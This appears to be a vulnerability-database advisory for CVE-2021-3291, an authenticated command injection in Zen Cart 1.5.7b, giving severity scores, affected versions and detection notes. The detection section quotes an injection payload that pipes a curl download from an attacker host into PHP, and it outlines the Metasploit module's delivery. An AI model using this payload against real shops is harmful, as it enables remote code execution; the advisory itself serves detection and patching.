cbcvebase.
CVE-2021-3291
published 2021-01-26

CVE-2021-3291: Zen Cart 1.5.7b allows admins to execute arbitrary OS commands by inspecting an HTML radio input element (within the modules edit page) and inserting a command.

PriorityP259high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
16.78%
96.6th percentile
Zen Cart 1.5.7b allows admins to execute arbitrary OS commands by inspecting an HTML radio input element (within the modules edit page) and inserting a command.

Affected

2 ranges
VendorProductVersion rangeFixed in
zen-cartzen_cart
zencartzencart>= 0 < 1.5.7c1.5.7c

Detection & IOCsextracted from sources · hover to see the quote

versionZen Cart 1.5.7b
url/cracK-Fqu-trasH/
commandTrue','F'); echo `curl #{@adresim} |php`; //
pathindex.php?cmd=login&camefrom=index.php
  • Monitor POST requests to the Zen Cart admin modules endpoint (index.php?cmd=modules&action=save) for configuration values containing SQL injection/command injection patterns such as single quotes, backticks, or shell command sequences (e.g., `curl ... |php`).
  • Detect exploitation attempts by looking for the payload pattern in POST body parameters targeting Zen Cart module configuration fields: the string pattern True','F'); echo `curl ... |php`; // is the injected OS command payload.
  • The Metasploit module uses a two-stage payload delivery: it starts a local HTTP server and injects a curl-pipe-php command into the Zen Cart database; detect outbound curl requests from the web server process to attacker-controlled infrastructure following a POST to the modules save endpoint.
  • ·Exploitation requires authenticated admin access; the vulnerability is only exploitable by an attacker who already holds valid admin credentials for the Zen Cart application.
  • ·The MODULE and SETTING options must match an installed/active Zen Cart module (e.g., payment/freecharger); the injection only fires when the affected module configuration is subsequently loaded/edited.

CVSS provenance

nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.